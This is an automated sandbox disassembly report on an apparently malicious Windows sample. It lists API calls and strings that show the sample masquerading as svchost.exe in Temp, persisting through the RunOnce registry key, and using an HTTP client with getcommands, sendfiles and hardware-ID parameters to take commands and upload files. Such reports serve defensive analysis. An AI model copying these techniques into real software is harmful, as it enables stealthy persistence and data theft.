Part of subcall function 00405950: memmove.VCRUNTIME140(00000000,811C9DC5,?,?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A27

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Part of subcall function 0041BC40: memset.VCRUNTIME140(00000000,00000000,00000108,?,00000001), ref: 0041BD37

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(\Temp\,?,00000000,path,00000004), ref: 004237F9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,\Temp\,?,00000000,path,00000004), ref: 004238E4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,\Temp\,?,00000000,path,00000004), ref: 0042393D
memset.VCRUNTIME140(?,00000000,00000108,?,?,00000000,00000000,00000000,svchost.exe,0000000B,?,?,\Temp\,?,00000000,path), ref: 00423A09
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,svchost.exe,0000000B,?,?,\Temp\,?,00000000,path,00000004), ref: 00423C40

Part of subcall function 00402920: ?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Curl session is not initialized ! Use InitSession() before.,0000004F,3A5313C3), ref: 004029DA
Part of subcall function 00402920: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00402A18

Part of subcall function 004022D0: ?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Curl session is not initialized ! Use InitSession() before.,0000004F,3A5313C3), ref: 0040233C
Part of subcall function 004022D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00402371

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,?,?,?,?,?,00000000,svchost.exe,0000000B,?,?,\Temp\,?), ref: 00423AA0
RegSetValueExW.KERNELBASE(00000000,HostFile,00000000,00000001,00000000,00000000,?,?,?,?,00000000,svchost.exe,0000000B,?,?,\Temp\), ref: 00423AD0
RegCloseKey.ADVAPI32(00000000,?,?,?,?,00000000,svchost.exe,0000000B,?,?,\Temp\,?,00000000,path,00000004), ref: 00423ADC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00423DCF

Part of subcall function 00404C60: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00404D89
Part of subcall function 00404C60: Concurrency::cancel_current_task.LIBCPMT ref: 00404D94

Part of subcall function 00426E10: _CxxThrowException.VCRUNTIME140(?,00555480,-000000FC), ref: 00426ED6
Part of subcall function 00426E10: _CxxThrowException.VCRUNTIME140(?,00555750,?,?,?,-000000FC), ref: 00426F09

Part of subcall function 0042B590: _CxxThrowException.VCRUNTIME140(?,00555480,3A5313C3), ref: 0042B64D

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000003), ref: 00423FD4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000003), ref: 00424094

Strings

\Temp\, xrefs: 00423782
RC, xrefs: 00423A19
&hwid=, xrefs: 00423D01
path, xrefs: 004236F3
update, xrefs: 00424016
error, xrefs: 00423F1B
svchost.exe, xrefs: 00423968
new, xrefs: 00423FF6
connect, xrefs: 00423DFB
getpu, xrefs: 00423698
e_user, xrefs: 00423660, 0042366D, 00423CE0, 00423CED
h@R, xrefs: 00423C98
idb=, xrefs: 00423670, 00423CF0
HostFile, xrefs: 00423AC5
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00423A96
msg, xrefs: 00423E63

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memmove$ExceptionThrow$Xbad_function_call@std@@memset$CloseConcurrency::cancel_current_taskOpenValue
String ID: &hwid=$HostFile$Software\Microsoft\Windows\CurrentVersion\RunOnce$\Temp\$connect$e_user$error$getpu$h@R$idb=$msg$new$path$svchost.exe$update$RC
API String ID: 3252452816-1558185588
Opcode ID: b357009b152f64ef3b55e1c3fe6521afe02d53dad461e28a612180b346ebc3fb
Instruction ID: 50c374368eed92288385a5c85ad6b3e053951d1c49a2f6ee5d24e9813059e997
Opcode Fuzzy Hash: b357009b152f64ef3b55e1c3fe6521afe02d53dad461e28a612180b346ebc3fb
Instruction Fuzzy Hash: A1620470E002589BEB14DF68DD89BDEBBB1EF46304F50819DE005A72C2DB799A84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00402920 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 343
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Curl session is not initialized ! Use InitSession() before.,0000004F,3A5313C3), ref: 004029DA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00402A18
memset.VCRUNTIME140(?,00000000,000000B0), ref: 00402A68
??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 00402A7D
??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 00402AA5
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 00402AE7
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140 ref: 00402B0C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,00000032,00000000), ref: 00402B6D
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,00000032,00000000), ref: 00402B79
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000), ref: 00402C03
remove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?), ref: 00402C3C
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 00402CC7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00402D0F
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402D6C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402DA8
??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00402E3D
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00402E49
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00402E52

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Strings

]@, xrefs: 00402ABB, 00402BC6, 00402DC7
[HTTPClient][Error] Unable to open local file %s, xrefs: 00402D2F
BT, xrefs: 00402AC6
@J@, xrefs: 00402AF7, 00402DF0
[HTTPClient][Error] Unable to perform a request - '%s' from '%s' (Error = %d | %s) (HTTP_Status = %ld), xrefs: 00402C8A
[HTTPClient][Error] Curl session is not initialized ! Use InitSession() before., xrefs: 004029A9

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: U?$char_traits@$D@std@@@std@@$Xbad_function_call@std@@_invalid_parameter_noinfo_noreturn$?setstate@?$basic_ios@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@?clear@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@memmovememsetremove
String ID: @J@$[HTTPClient][Error] Curl session is not initialized ! Use InitSession() before.$[HTTPClient][Error] Unable to open local file %s$[HTTPClient][Error] Unable to perform a request - '%s' from '%s' (Error = %d | %s) (HTTP_Status = %ld)$BT$]@
API String ID: 617407003-2775184277
Opcode ID: 7fc28e21fc7de79c8b40502bc4270a4f0b2de264cc97698150d9566d12ebd876
Instruction ID: 97f13a76a95f3017a66c5737b05c92ebcbbd813b23e5bfe182e97a4bfd34aa73
Opcode Fuzzy Hash: 7fc28e21fc7de79c8b40502bc4270a4f0b2de264cc97698150d9566d12ebd876
Instruction Fuzzy Hash: 6AE18E70A01204DBEB24CF64DE98B9D7BB4BF55304F1041A9E909AB3D1DBB59E84CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004C48F0 Relevance: 38.7, APIs: 4, Strings: 18, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,\\.\root\,00000000,3A5313C3,00000000,00000000,?), ref: 004C498F
SysFreeString.OLEAUT32(00000000), ref: 004C4A50
_CxxThrowException.VCRUNTIME140(?,005557D8,?,80070057), ref: 004C4C03

Strings

Error executing query: WBEM_E_INVALID_CLASS, xrefs: 004C4DF7
Error executing query: WBEM_E_TRANSPORT_FAILURE, xrefs: 004C4E58
Error initializing IWbemServices: WBEM_E_TRANSPORT_FAILURE, xrefs: 004C4B07
Coult not set proxy blanket: E_INVALIDARG, xrefs: 004C4BA2
Error executing query: WBEM_E_ACCESS_DENIED, xrefs: 004C4EB8
Error executing query: WBEM_E_INVALID_PARAMETER, xrefs: 004C4E10
Error initializing IWbemServices: Unknown Error, xrefs: 004C4B39
Error executing query: WBEM_E_SHUTTING_DOWN, xrefs: 004C4E42
Error initializing IWbemServices: WBEM_E_OUT_OF_MEMORY, xrefs: 004C4AEE
Coult not set proxy blanket: Unknown Error, xrefs: 004C4B7A
Error initializing IWbemServices: WBEM_E_LOCAL_CREDENTIALS, xrefs: 004C4B20
Error initializing IWbemServices: WBEM_E_ACCESS_DENIED, xrefs: 004C4BD9
Error initializing IWbemServices: WBEM_E_INVALID_NAMESPACE, xrefs: 004C4ABC
Error initializing IWbemServices: WBEM_E_FAILED, xrefs: 004C4AA3
\\.\root\, xrefs: 004C4937
Error executing query: WBEM_E_FAILED, xrefs: 004C4DDE
Error executing query: WBEM_E_OUT_OF_MEMORY, xrefs: 004C4E29
Error initializing IWbemServices: WBEM_E_INVALID_PARAMETER, xrefs: 004C4AD5

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: FreeString$ExceptionThrow
String ID: Coult not set proxy blanket: E_INVALIDARG$Coult not set proxy blanket: Unknown Error$Error executing query: WBEM_E_ACCESS_DENIED$Error executing query: WBEM_E_FAILED$Error executing query: WBEM_E_INVALID_CLASS$Error executing query: WBEM_E_INVALID_PARAMETER$Error executing query: WBEM_E_OUT_OF_MEMORY$Error executing query: WBEM_E_SHUTTING_DOWN$Error executing query: WBEM_E_TRANSPORT_FAILURE$Error initializing IWbemServices: Unknown Error$Error initializing IWbemServices: WBEM_E_ACCESS_DENIED$Error initializing IWbemServices: WBEM_E_FAILED$Error initializing IWbemServices: WBEM_E_INVALID_NAMESPACE$Error initializing IWbemServices: WBEM_E_INVALID_PARAMETER$Error initializing IWbemServices: WBEM_E_LOCAL_CREDENTIALS$Error initializing IWbemServices: WBEM_E_OUT_OF_MEMORY$Error initializing IWbemServices: WBEM_E_TRANSPORT_FAILURE$\\.\root\
API String ID: 3087865946-291933943
Opcode ID: cb00df3497fe85c1c2615e1c20db441f816a1989ffb5f2efa2c2aadaab056c81
Instruction ID: 30b0e624ffeb17543f2be00646177cb314cd5f5da46715cede6168875ff9a8c6
Opcode Fuzzy Hash: cb00df3497fe85c1c2615e1c20db441f816a1989ffb5f2efa2c2aadaab056c81
Instruction Fuzzy Hash: BA81C2B4901215ABDB60DFA0DE55FAFBBB4BF80714F10452EE401672D1EB78AE44CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004E0F50 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 164
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,3A5313C3), ref: 004E0F77
WSACleanup.WS2_32 ref: 004E0F8F
GetModuleHandleA.KERNEL32(kernel32,?,00000000), ref: 004E0FC5
GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 004E0FEA
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(iphlpapi.dll,00534244,?,?,?,00000000), ref: 004E0FF8
LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 004E1020
GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 004E1037
LoadLibraryExA.KERNELBASE(iphlpapi.dll,00000000,00000800), ref: 004E1049
GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 004E1056
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000D), ref: 004E1066
GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 004E1077
LoadLibraryA.KERNEL32(00000000), ref: 004E10CD
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 004E10D6
GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 004E10F5
QueryPerformanceFrequency.KERNEL32(0055E328), ref: 004E112A

Strings

iphlpapi.dll, xrefs: 004E0FF1, 004E100D, 004E101B, 004E1044, 004E10A9
kernel32, xrefs: 004E0FBE
AddDllDirectory, xrefs: 004E1031
LoadLibraryExA, xrefs: 004E0FE4
if_nametoindex, xrefs: 004E10EF

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleModulePerformanceQueryStartupfreemallocstrpbrk
String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
API String ID: 2882270050-2794540096
Opcode ID: 8b721615f78b40bbe2f74b71a784527518f2930f1a078c22ce2fdf658038c0ba
Instruction ID: 95b79c3addfc0c49eba5c1d216e4195373f644be35c07d38b78e267686ed87f2
Opcode Fuzzy Hash: 8b721615f78b40bbe2f74b71a784527518f2930f1a078c22ce2fdf658038c0ba
Instruction Fuzzy Hash: 8951A0342803C15BE7305B669C1AB7B7BA4BF55706F040159FD42A73E1EBB8A80AD629

Uniqueness

Uniqueness Score: -1.00%

Function 0041A950 Relevance: 30.8, APIs: 14, Strings: 3, Instructions: 1003registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000,3A5313C3,?), ref: 0041A9D3
RegEnumKeyW.ADVAPI32(00000000,00000000,?,0000020A), ref: 0041AA13
memset.VCRUNTIME140(?,00000000,0000020A), ref: 0041AADE
RegGetValueW.KERNELBASE(80000002,00000000,005443B4,0000FFFF,00000000,?,00002000), ref: 0041AB77

Strings

\shell\open\command, xrefs: 0041ABF4
| ver. , xrefs: 0041B4FE
list too long, xrefs: 0041B865

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: EnumOpenValuememset
String ID: | ver. $\shell\open\command$list too long
API String ID: 1295549309-685068868
Opcode ID: 2409133eecdbaa6857f4453e63d4ecf43dab18a61a0cd33a3edbc6a322923485
Instruction ID: dc5da23adb98841be5931098206f51cc08adba20be582a6187be929a22144ea8
Opcode Fuzzy Hash: 2409133eecdbaa6857f4453e63d4ecf43dab18a61a0cd33a3edbc6a322923485
Instruction Fuzzy Hash: 3B92AD70D052688BDB24DB28CD44BDDBBB6EF95304F1082D9D40CA7292DB79AAC4CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00422640 Relevance: 29.0, APIs: 7, Strings: 9, Instructions: 1005COMMON

Download Yara Rule

APIs

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

memset.VCRUNTIME140(?,00000000,00000100,?,?,?,?,?,\Temp\,?), ref: 00422B91
memset.VCRUNTIME140(?,00000000,00000108), ref: 00422E0F

Part of subcall function 004021C0: ?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Curl session is already initialized ! Use CleanupSession() to clean the present one.,00000068), ref: 00402236
Part of subcall function 004021C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040226B

Part of subcall function 00404C60: memmove.VCRUNTIME140(00000000,?,?), ref: 00404D3C

?_Xout_of_range@std@@YAXPBD@Z.MSVCP140(stoi argument out of range), ref: 004235B2
?_Xinvalid_argument@std@@YAXPBD@Z.MSVCP140(invalid stoi argument), ref: 004235BD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004235C3

Part of subcall function 00404970: memmove.VCRUNTIME140(00000000,iS@,iS@,00000000,811C9DC5,?,?,00405369,?), ref: 00404A16

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

Strings

\Temp\, xrefs: 0042291B
SC, xrefs: 00422E1F
invalid stoi argument, xrefs: 004235B8
sendfiles, xrefs: 0042311C
e_user, xrefs: 00422F3D, 00422F50
idb, xrefs: 00422F06
hwid, xrefs: 00422FAA
stoi argument out of range, xrefs: 004235AD
file, xrefs: 00423051

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturnmemset$Xbad_function_call@std@@Xinvalid_argument@std@@Xout_of_range@std@@malloc
String ID: SC$\Temp\$e_user$file$hwid$idb$invalid stoi argument$sendfiles$stoi argument out of range
API String ID: 1682264443-131978810
Opcode ID: 1299e539897b79c925dcf57c9ff6071cab84d855d69af8292ba917cb5d7c2b11
Instruction ID: b7c3604a1501c6a8565736a70833ed0bf2641cb4fada6c65dd400d0ed1b55548
Opcode Fuzzy Hash: 1299e539897b79c925dcf57c9ff6071cab84d855d69af8292ba917cb5d7c2b11
Instruction Fuzzy Hash: AC92CD70A002689FEB29CF68DD84B9DBBB5BF45304F5082D9E009A7291DB799BC4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00421DC0 Relevance: 28.6, APIs: 6, Strings: 10, Instructions: 635
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_CxxThrowException.VCRUNTIME140(?,00555480), ref: 00422422

Part of subcall function 00405950: memmove.VCRUNTIME140(?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A16
Part of subcall function 00405950: memmove.VCRUNTIME140(00000000,811C9DC5,?,?,?,00000000,?,?,00000000,811C9DC5,?,00000000,00000001,811C9DC5,?), ref: 00405A27

Part of subcall function 00427FB0: memmove.VCRUNTIME140(?,00000001,00000002,3A5313C3,?,00000000,?,0042A221,[json.exception.,00000010,3A5313C3,3A5313C3), ref: 00427FEC

Part of subcall function 00405100: memmove.VCRUNTIME140(00000000,00000000,?,?,?,00000000,?,?,00000000,00000001,811C9DC5,?), ref: 00405142

Part of subcall function 0042DC90: memmove.VCRUNTIME140(?,?,?,00000001,3A5313C3,?), ref: 0042DD15

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,&command=), ref: 0042208B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000005,?,?,?,00000003), ref: 00422345
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000003), ref: 0042237B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,msg,00000003), ref: 004223B9

Strings

RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4, xrefs: 0042253A, 0042253F, 0042255B, 0042256F, 00422576
&hwid=, xrefs: 00421E6D
&command=, xrefs: 00421ED7
getcommands, xrefs: 004220C3
e_user, xrefs: 00421E46, 00421E53
idb=, xrefs: 00421E56
paths, xrefs: 00422294
files, xrefs: 00422261
command, xrefs: 004221B3
msg, xrefs: 00422118

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn$ExceptionThrow
String ID: &command=$&hwid=$RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4$command$e_user$files$getcommands$idb=$msg$paths
API String ID: 995303429-3451433999
Opcode ID: b7409dd04d1615fb8419040ee9720b04cf2201d38faba06d63e957f216931b65
Instruction ID: 00c1000607999b2c012675c24f5a0c5f672d89abe50ce7539d831b0094d777bc
Opcode Fuzzy Hash: b7409dd04d1615fb8419040ee9720b04cf2201d38faba06d63e957f216931b65
Instruction Fuzzy Hash: DC324471E002189BEB18DF78DD45BAEBBB1AF85304F50819DE405A73C2DB799A84CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004E0DB0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 148
librarystringloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32,?,?,security.dll,0051236D,security.dll,00000004,00000000,00000000,00000002,00000002,004E0FB4), ref: 004E0DBA
GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 004E0DD2
strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,00534244,?,?,?,security.dll,0051236D,security.dll,00000004,00000000,00000000,00000002,00000002,004E0FB4), ref: 004E0DE4

Strings

kernel32, xrefs: 004E0DB3
security.dll, xrefs: 004E0DB0
AddDllDirectory, xrefs: 004E0E17
LoadLibraryExA, xrefs: 004E0DCC

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcstrpbrk
String ID: AddDllDirectory$LoadLibraryExA$kernel32$security.dll
API String ID: 27745253-2138446276
Opcode ID: 99061468dbd575fc45cf478441bafc714c76c86b33555b7afa5fc8b205c2a59e
Instruction ID: 8155a5ff9794f30b919f9625c163dfe846c15c41dab9bc49098ea4f9d3a21525
Opcode Fuzzy Hash: 99061468dbd575fc45cf478441bafc714c76c86b33555b7afa5fc8b205c2a59e
Instruction Fuzzy Hash: E34166763043415BDB100F6DAC487BB7B19EF91327F24057AFA02D3341EBAA940A9668

Uniqueness

Uniqueness Score: -1.00%

Function 00411F00 Relevance: 25.7, APIs: 17, Instructions: 170
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000104), ref: 00411F29
memset.VCRUNTIME140(00000000,00000000,00000104), ref: 00411F35
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00411F4B
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 00411F72
lstrcatA.KERNEL32(00000000,00000000), ref: 00411F98
CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 00411FAE
GetFileSize.KERNEL32(00000000,00000000), ref: 00411FC2
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00411FD3
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 00411FE3
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00411FF7
CloseHandle.KERNEL32(00000000), ref: 00412002
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00412009
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 00412018
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00412096
lstrcatA.KERNEL32(?,00000000), ref: 004120A0
lstrlenA.KERNEL32(?), ref: 004120A7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 004120B3

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Filemallocmemset$FolderPathfreelstrcat$CloseCreateHandleReadSizelstrlen
String ID:
API String ID: 496183644-0
Opcode ID: 28935a646d26a5d2a3996494717b0983444dff2e2ea1b23c075d66ba9fc438f9
Instruction ID: dc6f1c214a37fad5922f5d0fcc7e6056b961f352b3bc871ddd371ecfcbfae49c
Opcode Fuzzy Hash: 28935a646d26a5d2a3996494717b0983444dff2e2ea1b23c075d66ba9fc438f9
Instruction Fuzzy Hash: 02515B70A002096FEB209B64DD49BEF7FA8EF5A310F04015AF605DB391D7B8985AC795

Uniqueness

Uniqueness Score: -1.00%

Function 0044C230 Relevance: 24.8, APIs: 3, Strings: 11, Instructions: 334
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.VCRUNTIME140(?,00000000,00000048), ref: 0044C2C0
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,00000000,etilqs_), ref: 0044C331
CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 0044C42D

Part of subcall function 0044C230: memset.VCRUNTIME140(00000000,00000000,?), ref: 0044BCE4

Strings

f66f7a17b78ba617acde90fc810107f34f1a1f2e, xrefs: 0044C556
winGetTempname1, xrefs: 0044BDCB
delayed %dms for lock/sharing conflict, xrefs: 0044C4B1
winGetTempname4, xrefs: 0044C1B7
winGetTempname2, xrefs: 0044BEDA
winGetTempname5, xrefs: 0044C02C
psow, xrefs: 0044C5D7
cannot open file at line %d of [%.10s], xrefs: 0044C560
winOpen, xrefs: 0044C4DD
os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 0044BDD7, 0044BEE5, 0044C038, 0044C1C3
etilqs_, xrefs: 0044BC9C, 0044BCAA, 0044C05D, 0044C091, 0044C250

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memset$CreateFile
String ID: cannot open file at line %d of [%.10s]$delayed %dms for lock/sharing conflict$etilqs_$f66f7a17b78ba617acde90fc810107f34f1a1f2e$os_win.c:%d: (%lu) %s(%s) - %s$psow$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5$winOpen
API String ID: 333288564-1390497953
Opcode ID: e211818bf6fa5cb400c8c19f8db15d56c93b647c9ad34a8511bf33a4fc5f04f0
Instruction ID: ca2337103a01964f632b6cf347b84431eb0dbdd1cf15643687a2f794ff4369f1
Opcode Fuzzy Hash: e211818bf6fa5cb400c8c19f8db15d56c93b647c9ad34a8511bf33a4fc5f04f0
Instruction Fuzzy Hash: 68C1F271605301ABF7609F24D89672BBBE0FB85314F084A2EF845D7391EB79D8448B87

Uniqueness

Uniqueness Score: -1.00%

Function 004C4F40 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,000000FF,00000001,?,?,3A5313C3,?,-00000002,?), ref: 004C504D
